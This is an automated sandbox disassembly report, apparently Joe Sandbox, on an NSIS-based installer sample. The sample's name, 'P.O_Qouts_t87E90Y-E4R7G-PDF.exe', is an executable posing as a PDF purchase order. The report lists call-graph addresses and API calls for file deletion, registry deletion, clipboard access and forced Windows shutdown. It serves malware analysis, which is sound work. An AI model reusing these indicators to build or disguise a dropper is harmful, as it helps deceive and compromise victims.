SetFileAttributesA 3948->3949 3950 4015b6 3949->3950 4517 40149d 4518 402387 4517->4518 4519 4014ab PostQuitMessage 4517->4519 4519->4518 4520 401a1e 4521 402bce 17 API calls 4520->4521 4522 401a27 ExpandEnvironmentStringsA 4521->4522 4523 401a3b 4522->4523 4525 401a4e 4522->4525 4524 401a40 lstrcmpA 4523->4524 4523->4525 4524->4525 4531 40171f 4532 402bce 17 API calls 4531->4532 4533 401726 SearchPathA 4532->4533 4534 401741 4533->4534 4535 401d1f 4536 402bac 17 API calls 4535->4536 4537 401d26 4536->4537 4538 402bac 17 API calls 4537->4538 4539 401d32 GetDlgItem 4538->4539 4540 402620 4539->4540 3111 402421 3112 402453 3111->3112 3113 402428 3111->3113 3123 402bce 3112->3123 3133 402c0e 3113->3133 3118 402439 3120 402bce 17 API calls 3118->3120 3122 402440 RegDeleteValueA RegCloseKey 3120->3122 3121 402467 3122->3121 3124 402bda 3123->3124 3138 406154 3124->3138 3127 40245a 3129 402c8c 3127->3129 3130 402c98 3129->3130 3131 402c9f 3129->3131 3130->3121 3131->3130 3180 402cd0 3131->3180 3134 402bce 17 API calls 3133->3134 3135 402c25 3134->3135 3136 405f47 RegOpenKeyExA 3135->3136 3137 40242f 3136->3137 3137->3118 3137->3121 3142 406161 3138->3142 3139 406383 3140 402bfb 3139->3140 3171 4060c1 lstrcpynA 3139->3171 3140->3127 3155 40639c 3140->3155 3142->3139 3143 40635d lstrlenA 3142->3143 3146 406154 10 API calls 3142->3146 3147 406279 GetSystemDirectoryA 3142->3147 3149 40628c GetWindowsDirectoryA 3142->3149 3150 40639c 5 API calls 3142->3150 3151 406306 lstrcatA 3142->3151 3152 4062c0 SHGetSpecialFolderLocation 3142->3152 3153 406154 10 API calls 3142->3153 3164 405fa8 3142->3164 3169 40601f wsprintfA 3142->3169 3170 4060c1 lstrcpynA 3142->3170 3143->3142 3146->3143 3147->3142 3149->3142 3150->3142 3151->3142 3152->3142 3154 4062d8 SHGetPathFromIDListA CoTaskMemFree 3152->3154 3153->3142 3154->3142 3156 4063a8 3155->3156 3158 406410 3156->3158 3159 406405 CharNextA 3156->3159 3162 4063f3 CharNextA 3156->3162 3163 406400 CharNextA 3156->3163 3176 405a84 3156->3176 3157 406414 CharPrevA 3157->3158 3158->3157 3160 40642f 3158->3160 3159->3156 3159->3158 3160->3127 3162->3156 3163->3159 3172 405f47 3164->3172 3167 40600b 3167->3142 3168 405fdc RegQueryValueExA RegCloseKey 3168->3167 3169->3142 3170->3142 3171->3140 3173 405f56 3172->3173 3174 405f5a 3173->3174 3175 405f5f RegOpenKeyExA 3173->3175 3174->3167 3174->3168 3175->3174 3177 405a8a 3176->3177 3178 405a9d 3177->3178 3179 405a90 CharNextA 3177->3179 3178->3156 3179->3177 3181 405f47 RegOpenKeyExA 3180->3181 3182 402cfe 3181->3182 3183 402db3 3182->3183 3184 402d08 3182->3184 3183->3130 3185 402d0e RegEnumValueA 3184->3185 3194 402d31 3184->3194 3186 402d98 RegCloseKey 3185->3186 3185->3194 3186->3183 3187 402d6d RegEnumKeyA 3188 402d76 RegCloseKey 3187->3188 3187->3194 3195 4064ca GetModuleHandleA 3188->3195 3190 402cd0 6 API calls 3190->3194 3192 402da8 3192->3183 3193 402d8a RegDeleteKeyA 3193->3183 3194->3186 3194->3187 3194->3188 3194->3190 3196 4064f0 GetProcAddress 3195->3196 3197 4064e6 3195->3197 3200 402d86 3196->3200 3201 40645c GetSystemDirectoryA 3197->3201 3199 4064ec 3199->3196 3199->3200 3200->3192 3200->3193 3202 40647e wsprintfA LoadLibraryExA 3201->3202 3202->3199 4541 4027a1 4542 402bce 17 API calls 4541->4542 4543 4027a8 FindFirstFileA 4542->4543 4544 4027cb 4543->4544 4545 4027bb 4543->4545 4546 4027d2 4544->4546 4549 40601f wsprintfA 4544->4549 4550 4060c1 lstrcpynA 4546->4550 4549->4546 4550->4545 3204 4057a3 ShellExecuteExA 3215 405326 3216 4054d1 3215->3216 3217 405348 GetDlgItem GetDlgItem GetDlgItem 3215->3217 3218 405501 3216->3218 3219 4054d9 GetDlgItem CreateThread FindCloseChangeNotification 3216->3219 3260 40417a SendMessageA 3217->3260 3221 40552f 3218->3221 3223 405550 3218->3223 3224 405517 ShowWindow ShowWindow 3218->3224 3219->3218 3294 4052ba OleInitialize 3219->3294 3225 40558a 3221->3225 3228 405563 ShowWindow 3221->3228 3229 40553f 3221->3229 3222 4053b8 3226 4053bf GetClientRect GetSystemMetrics SendMessageA SendMessageA 3222->3226 3269 4041ac 3223->3269 3265 40417a SendMessageA 3224->3265 3225->3223 3233 405597 SendMessageA 3225->3233 3231 405411 SendMessageA SendMessageA 3226->3231 3232 40542d 3226->3232 3235 405583 3228->3235 3236 405575 3228->3236 3266 40411e 3229->3266 3231->3232 3238 405440 3232->3238 3239 405432 SendMessageA 3232->3239 3240 4055b0 CreatePopupMenu 3233->3240 3241 40555c 3233->3241 3237 40411e SendMessageA 3235->3237 3283 4051e8 3236->3283 3237->3225 3261 404145 3238->3261 3239->3238 3243 406154 17 API calls 3240->3243 3245 4055c0 AppendMenuA 3243->3245 3247 4055f1 TrackPopupMenu 3245->3247 3248 4055de GetWindowRect 3245->3248 3246 405450 3249 405459 ShowWindow 3246->3249 3250 40548d GetDlgItem SendMessageA 3246->3250 3247->3241 3251 40560d 3247->3251 3248->3247 3252 40547c 3249->3252 3253 40546f ShowWindow 3249->3253 3250->3241 3254 4054b4 SendMessageA SendMessageA 3250->3254 3255 40562c SendMessageA 3251->3255 3264 40417a SendMessageA 3252->3264 3253->3252 3254->3241 3255->3255 3256 405649 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3255->3256 3258 40566b SendMessageA 3256->3258 3258->3258 3259 40568d GlobalUnlock SetClipboardData CloseClipboard 3258->3259 3259->3241 3260->3222 3262 406154 17 API calls 3261->3262 3263 404150 SetDlgItemTextA 3262->3263 3263->3246 3264->3250 3265->3221 3267 404125 3266->3267 3268 40412b SendMessageA 3266->3268 3267->3268 3268->3223 3270 40426f 3269->3270 3271 4041c4 GetWindowLongA 3269->3271 3270->3241 3271->3270 3272 4041d9 3271->3272 3272->3270 3273 404206 GetSysColor 3272->3273 3274 404209 3272->3274 3273->3274 3275 404219 SetBkMode 3274->3275 3276 40420f SetTextColor 3274->3276 3277 404231 GetSysColor 3275->3277 3278 404237 3275->3278 3276->3275 3277->3278 3279 404248 3278->3279 3280 40423e SetBkColor 3278->3280 3279->3270 3281 404262 CreateBrushIndirect 3279->3281 3282 40425b DeleteObject 3279->3282 3280->3279 3281->3270 3282->3281 3284 4052a6 3283->3284 3285 405203 3283->3285 3284->3235 3286 405220 lstrlenA 3285->3286 3287 406154 17 API calls 3285->3287 3288 405249 3286->3288 3289 40522e lstrlenA 3286->3289 3287->3286 3290 40525c 3288->3290 3291 40524f SetWindowTextA 3288->3291 3289->3284 3292 405240 lstrcatA 3289->3292 3290->3284 3293 405262 SendMessageA SendMessageA SendMessageA 3290->3293 3291->3290 3292->3288 3293->3284 3301 404191 3294->3301 3296 405304 3297 404191 SendMessageA 3296->3297 3299 405316 OleUninitialize 3297->3299 3298 4052dd 3298->3296 3304 401389 3298->3304 3302 4041a9 3301->3302 3303 40419a SendMessageA 3301->3303 3302->3298 3303->3302 3306 401390 3304->3306 3305 4013fe 3305->3298 3306->3305 3307 4013cb MulDiv SendMessageA 3306->3307 3307->3306 4558 402626 4559 40262b 4558->4559 4560 40263f 4558->4560 4561 402bac 17 API calls 4559->4561 4562 402bce 17 API calls 4560->4562 4563 402634 4561->4563 4564 402646 lstrlenA 4562->4564 4565 402668 4563->4565 4566 405d01 WriteFile 4563->4566 4564->4563 4566->4565 4567 404928 4568 404954 4567->4568 4569 404938 4567->4569 4570 404987 4568->4570 4571 40495a SHGetPathFromIDListA 4568->4571 4578 4057c1 GetDlgItemTextA 4569->4578 4574 40496a 4571->4574 4577 404971 SendMessageA 4571->4577 4573 404945 SendMessageA 4573->4568 4575 40140b 2 API calls 4574->4575 4575->4577 4577->4570 4578->4573 4579 401c2e 4580 402bac 17 API calls 4579->4580 4581 401c35 4580->4581 4582 402bac 17 API calls 4581->4582 4583 401c42 4582->4583 4584 402bce 17 API calls 4583->4584 4586 401c57 4583->4586 4584->4586 4585 401c67 4588 401c72 4585->4588 4589 401cbe 4585->4589 4586->4585 4587 402bce 17 API calls 4586->4587 4587->4585 4591 402bac 17 API calls 4588->4591 4590 402bce 17 API calls 4589->4590 4592 401cc3 4590->4592 4593 401c77 4591->4593 4594 402bce 17 API calls 4592->4594 4595 402bac 17 API calls 4593->4595 4596 401ccc FindWindowExA 4594->4596 4597 401c83 4595->4597 4600 401cea 4596->4600 4598 401c90 SendMessageTimeoutA 4597->4598 4599 401cae SendMessageA 4597->4599 4598->4600 4599->4600 4601 4042b0 4602 4042c6 4601->4602 4607 4043d2 4601->4607 4604 404145 18 API calls 4602->4604 4603 404441 4605 40450b 4603->4605 4606 40444b GetDlgItem 4603->4606 4608 40431c 4604->4608 4612 4041ac 8 API calls 4605->4612 4609 404461 4606->4609 4610 4044c9 4606->4610 4607->4603 4607->4605 4613 404416 GetDlgItem SendMessageA 4607->4613 4611 404145 18 API calls 4608->4611 4609->4610 4616 404487 SendMessageA LoadCursorA SetCursor 4609->4616 4610->4605 4617 4044db 4610->4617 4614 404329 CheckDlgButton 4611->4614 4615 404506 4612->4615 4634 404167 KiUserCallbackDispatcher 4613->4634 4632 404167 KiUserCallbackDispatcher 4614->4632 4635 404554 4616->4635 4622 4044e1 SendMessageA 4617->4622 4623 4044f2 4617->4623 4619 40443c 4624 404530 SendMessageA 4619->4624 4622->4623 4623->4615 4627 4044f8 SendMessageA 4623->4627 4624->4603 4625 404347 GetDlgItem 4633 40417a SendMessageA 4625->4633 4627->4615 4629 40435d SendMessageA 4630 404384 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4629->4630 4631 40437b GetSysColor 4629->4631 4630->4615 4631->4630 4632->4625 4633->4629 4634->4619 4638 4057a3 ShellExecuteExA 4635->4638 4637 4044ba LoadCursorA SetCursor 4637->4610 4638->4637 4646 401e35 GetDC 4647 402bac 17 API calls 4646->4647 4648 401e47 GetDeviceCaps MulDiv ReleaseDC 4647->4648 4649 402bac 17 API calls 4648->4649 4650 401e78 4649->4650 4651 406154 17 API calls 4650->4651 4652 401eb5 CreateFontIndirectA 4651->4652 4653 402620 4652->4653 4654 402a35 SendMessageA 4655 402a5a 4654->4655 4656 402a4f InvalidateRect 4654->4656 4656->4655 4657 4014b7 4658 4014bd 4657->4658 4659 401389 2 API calls 4658->4659 4660 4014c5 4659->4660 4661 402dba 4662 402de2 4661->4662 4663 402dc9 SetTimer 4661->4663 4664 402e37 4662->4664 4665 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4662->4665 4663->4662 4665->4664 3906 4015bb 3907 402bce 17 API calls 3906->3907 3908 4015c2 3907->3908 3909 405af2 4 API calls 3908->3909 3922 4015ca 3909->3922 3910 401624 3912 401629 3910->3912 3913 401652 3910->3913 3911 405a84 CharNextA 3911->3922 3925 401423 3912->3925 3916 401423 24 API calls 3913->3916 3921 40164a 3916->3921 3918 40572b 2 API calls 3918->3922 3919 405748 5 API calls 3919->3922 3920 40163b SetCurrentDirectoryA 3920->3921 3922->3910 3922->3911 3922->3918 3922->3919 3923 40160c GetFileAttributesA 3922->3923 3924 4056ae 4 API calls 3922->3924 3923->3922 3924->3922 3926 4051e8 24 API calls 3925->3926 3927 401431 3926->3927 3928 4060c1 lstrcpynA 3927->3928 3928->3920 4666 4016bb 4667 402bce 17 API calls 4666->4667 4668 4016c1 GetFullPathNameA 4667->4668 4669 4016f9 4668->4669 4670 4016d8 4668->4670 4671 402a5a 4669->4671 4672 40170d GetShortPathNameA 4669->4672 4670->4669 4673 406435 2 API calls 4670->4673 4672->4671 4674 4016e9 4673->4674 4674->4669 4676 4060c1 lstrcpynA 4674->4676 4676->4669 4677 4067be 4678 406642 4677->4678 4679 406fad 4678->4679 4680 4066c3 GlobalFree 4678->4680 4681 4066cc GlobalAlloc 4678->4681 4682 406743 GlobalAlloc 4678->4682 4683 40673a GlobalFree 4678->4683 4680->4681 4681->4678 4681->4679 4682->4678 4682->4679 4683->4682

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 403312-403351 SetErrorMode GetVersion 1 403353-40335b call 4064ca 0->1 2 403364 0->2 1->2 7 40335d 1->7 4 403369-40337c call 40645c lstrlenA 2->4 9 40337e-40339a call 4064ca * 3 4->9 7->2 16 4033ab-403409 #17 OleInitialize SHGetFileInfoA call 4060c1 GetCommandLineA call 4060c1 9->16 17 40339c-4033a2 9->17 24 403415-40342a call 405a84 CharNextA 16->24 25 40340b-403410 16->25 17->16 21 4033a4 17->21 21->16 28 4034ef-4034f3 24->28 25->24 29 4034f9 28->29 30 40342f-403432 28->30 31 40350c-403526 GetTempPathA call 4032e1 29->31 32 403434-403438 30->32 33 40343a-403442 30->33 42 403528-403546 GetWindowsDirectoryA lstrcatA call 4032e1 31->42 43 40357e-403598 DeleteFileA call 402ea1 31->43 32->32 32->33 34 403444-403445 33->34 35 40344a-40344d 33->35 34->35 37 403453-403457 35->37 38 4034df-4034ec call 405a84 35->38 40 403459-40345f 37->40 41 40346f-40349c 37->41 38->28 57 4034ee 38->57 45 403461-403463 40->45 46 403465 40->46 47 40349e-4034a4 41->47 48 4034af-4034dd 41->48 42->43 59 403548-403578 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032e1 42->59 60 40362c-40363c call 4037fa OleUninitialize 43->60 61 40359e-4035a4 43->61 45->41 45->46 46->41 52 4034a6-4034a8 47->52 53 4034aa 47->53 48->38 55 4034fb-403507 call 4060c1 48->55 52->48 52->53 53->48 55->31 57->28 59->43 59->60 72 403760-403766 60->72 73 403642-403652 call 4057dd ExitProcess 60->73 62 4035a6-4035b1 call 405a84 61->62 63 40361c-403623 call 4038d4 61->63 74 4035b3-4035dc 62->74 75 4035e7-4035f1 62->75 70 403628 63->70 70->60 77 4037e2-4037ea 72->77 78 403768-403781 GetCurrentProcess OpenProcessToken 72->78 79 4035de-4035e0 74->79 82 4035f3-403600 call 405b47 75->82 83 403658-40366c call 405748 lstrcatA 75->83 80 4037f0-4037f4 ExitProcess 77->80 81 4037ec 77->81 85 4037b3-4037c1 call 4064ca 78->85 86 403783-4037ad LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 4035e2-4035e5 79->87 81->80 82->60 94 403602-403618 call 4060c1 * 2 82->94 95 403679-403693 lstrcatA lstrcmpiA 83->95 96 40366e-403674 lstrcatA 83->96 97 4037c3-4037cd 85->97 98 4037cf-4037d9 ExitWindowsEx 85->98 86->85 87->75 87->79 94->63 95->60 101 403695-403698 95->101 96->95 97->98 99 4037db-4037dd call 40140b 97->99 98->77 98->99 99->77 105 4036a1 call 40572b 101->105 106 40369a-40369f call 4056ae 101->106 111 4036a6-4036b3 SetCurrentDirectoryA 105->111 106->111 113 4036c0-4036e8 call 4060c1 111->113 114 4036b5-4036bb call 4060c1 111->114 118 4036ee-40370a call 406154 DeleteFileA 113->118 114->113 121 40374b-403752 118->121 122 40370c-40371c CopyFileA 118->122 121->118 123 403754-40375b call 405ea0 121->123 122->121 124 40371e-40373e call 405ea0 call 406154 call 405760 122->124 123->60 124->121 133 403740-403747 CloseHandle 124->133 133->121
                                    APIs
                                    • SetErrorMode.KERNELBASE ref: 00403337
                                    • GetVersion.KERNEL32 ref: 0040333D
                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403370
                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033AC
                                    • OleInitialize.OLE32(00000000), ref: 004033B3
                                    • SHGetFileInfoA.SHELL32(0041FCE8,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033CF
                                    • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004033E4
                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",00000020,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",00000000,?,00000007,00000009,0000000B), ref: 00403420
                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040351D
                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040352E
                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040353A
                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354E
                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403556
                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403567
                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040356F
                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403583
                                      • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                      • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                      • Part of subcall function 004038D4: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets,1033,nsvis Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,nsvis Setup: Completed,00000000,00000002,75923410), ref: 004039C4
                                      • Part of subcall function 004038D4: lstrcmpiA.KERNEL32(?,.exe), ref: 004039D7
                                      • Part of subcall function 004038D4: GetFileAttributesA.KERNEL32(: Completed), ref: 004039E2
                                      • Part of subcall function 004038D4: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets), ref: 00403A2B
                                      • Part of subcall function 004038D4: RegisterClassA.USER32(00423EC0), ref: 00403A68
                                      • Part of subcall function 004037FA: CloseHandle.KERNEL32(000002C8,00403631,?,?,00000007,00000009,0000000B), ref: 00403805
                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403631
                                    • ExitProcess.KERNEL32 ref: 00403652
                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 0040376F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403776
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378E
                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AD
                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004037D1
                                    • ExitProcess.KERNEL32 ref: 004037F4
                                      • Part of subcall function 004057DD: MessageBoxIndirectA.USER32(0040A218), ref: 00405838
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                    • String ID: "$"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets$C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility$C:\Users\user\Desktop$C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                    • API String ID: 3776617018-1543417154
                                    • Opcode ID: 0d45e228ffb8fe7831b4221c412adb98f2aec3df1bfcf03eeb45bdaf9bf64adb
                                    • Instruction ID: fed38e33bd1ad5050a1aac335cdd74565c3a3e786a0889b069c8e2b205acfbdc
                                    • Opcode Fuzzy Hash: 0d45e228ffb8fe7831b4221c412adb98f2aec3df1bfcf03eeb45bdaf9bf64adb
                                    • Instruction Fuzzy Hash: 7CC108702047406AD721AF759D49A2F3EACEF85306F45443FF581B62D2CB7C8A598B2E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 134 405326-405342 135 4054d1-4054d7 134->135 136 405348-40540f GetDlgItem * 3 call 40417a call 404a6b GetClientRect GetSystemMetrics SendMessageA * 2 134->136 137 405501-40550d 135->137 138 4054d9-4054fb GetDlgItem CreateThread FindCloseChangeNotification 135->138 154 405411-40542b SendMessageA * 2 136->154 155 40542d-405430 136->155 140 40552f-405535 137->140 141 40550f-405515 137->141 138->137 146 405537-40553d 140->146 147 40558a-40558d 140->147 144 405550-405557 call 4041ac 141->144 145 405517-40552a ShowWindow * 2 call 40417a 141->145 158 40555c-405560 144->158 145->140 151 405563-405573 ShowWindow 146->151 152 40553f-40554b call 40411e 146->152 147->144 149 40558f-405595 147->149 149->144 156 405597-4055aa SendMessageA 149->156 159 405583-405585 call 40411e 151->159 160 405575-40557e call 4051e8 151->160 152->144 154->155 162 405440-405457 call 404145 155->162 163 405432-40543e SendMessageA 155->163 164 4055b0-4055dc CreatePopupMenu call 406154 AppendMenuA 156->164 165 4056a7-4056a9 156->165 159->147 160->159 173 405459-40546d ShowWindow 162->173 174 40548d-4054ae GetDlgItem SendMessageA 162->174 163->162 171 4055f1-405607 TrackPopupMenu 164->171 172 4055de-4055ee GetWindowRect 164->172 165->158 171->165 175 40560d-405627 171->175 172->171 176 40547c 173->176 177 40546f-40547a ShowWindow 173->177 174->165 178 4054b4-4054cc SendMessageA * 2 174->178 179 40562c-405647 SendMessageA 175->179 180 405482-405488 call 40417a 176->180 177->180 178->165 179->179 181 405649-405669 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40566b-40568b SendMessageA 181->183 183->183 184 40568d-4056a1 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                                    APIs
                                    • GetDlgItem.USER32(?,00000403), ref: 00405385
                                    • GetDlgItem.USER32(?,000003EE), ref: 00405394
                                    • GetClientRect.USER32(?,?), ref: 004053D1
                                    • GetSystemMetrics.USER32(00000002), ref: 004053D8
                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053F9
                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040540A
                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040541D
                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040542B
                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040543E
                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405460
                                    • ShowWindow.USER32(?,00000008), ref: 00405474
                                    • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054A5
                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054BE
                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054CA
                                    • GetDlgItem.USER32(?,000003F8), ref: 004053A3
                                      • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                    • GetDlgItem.USER32(?,000003EC), ref: 004054E6
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000052BA,00000000), ref: 004054F4
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054FB
                                    • ShowWindow.USER32(00000000), ref: 0040551E
                                    • ShowWindow.USER32(?,00000008), ref: 00405525
                                    • ShowWindow.USER32(00000008), ref: 0040556B
                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040559F
                                    • CreatePopupMenu.USER32 ref: 004055B0
                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055C5
                                    • GetWindowRect.USER32(?,000000FF), ref: 004055E5
                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055FE
                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040563A
                                    • OpenClipboard.USER32(00000000), ref: 0040564A
                                    • EmptyClipboard.USER32 ref: 00405650
                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 00405659
                                    • GlobalLock.KERNEL32(00000000), ref: 00405663
                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405677
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405690
                                    • SetClipboardData.USER32(00000001,00000000), ref: 0040569B
                                    • CloseClipboard.USER32 ref: 004056A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                    • String ID: (B
                                    • API String ID: 4154960007-3831730363
                                    • Opcode ID: d3419562442177eea9b62adf59552d27b6df34544d2fada850110dc2e5599538
                                    • Instruction ID: fe21aa704c045a880c187f0605a512594e5ece0db8e286b19571ae5c45aa8885
                                    • Opcode Fuzzy Hash: d3419562442177eea9b62adf59552d27b6df34544d2fada850110dc2e5599538
                                    • Instruction Fuzzy Hash: 23A15B71900608BFDB119FA4DE89EAE7B79FB48355F00403AFA41BA1A0C7794E51DF58

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 493 405889-4058af call 405b47 496 4058b1-4058c3 DeleteFileA 493->496 497 4058c8-4058cf 493->497 498 405a52-405a56 496->498 499 4058d1-4058d3 497->499 500 4058e2-4058f2 call 4060c1 497->500 501 405a00-405a05 499->501 502 4058d9-4058dc 499->502 508 405901-405902 call 405aa0 500->508 509 4058f4-4058ff lstrcatA 500->509 501->498 504 405a07-405a0a 501->504 502->500 502->501 506 405a14-405a1c call 406435 504->506 507 405a0c-405a12 504->507 506->498 516 405a1e-405a32 call 405a59 call 405841 506->516 507->498 511 405907-40590a 508->511 509->511 514 405915-40591b lstrcatA 511->514 515 40590c-405913 511->515 517 405920-40593e lstrlenA FindFirstFileA 514->517 515->514 515->517 532 405a34-405a37 516->532 533 405a4a-405a4d call 4051e8 516->533 518 405944-40595b call 405a84 517->518 519 4059f6-4059fa 517->519 526 405966-405969 518->526 527 40595d-405961 518->527 519->501 523 4059fc 519->523 523->501 530 40596b-405970 526->530 531 40597c-40598a call 4060c1 526->531 527->526 529 405963 527->529 529->526 535 405972-405974 530->535 536 4059d5-4059e7 FindNextFileA 530->536 543 4059a1-4059ac call 405841 531->543 544 40598c-405994 531->544 532->507 538 405a39-405a48 call 4051e8 call 405ea0 532->538 533->498 535->531 539 405976-40597a 535->539 536->518 541 4059ed-4059f0 FindClose 536->541 538->498 539->531 539->536 541->519 552 4059cd-4059d0 call 4051e8 543->552 553 4059ae-4059b1 543->553 544->536 547 405996-40599f call 405889 544->547 547->536 552->536 555 4059b3-4059c3 call 4051e8 call 405ea0 553->555 556 4059c5-4059cb 553->556 555->536 556->536
                                    APIs
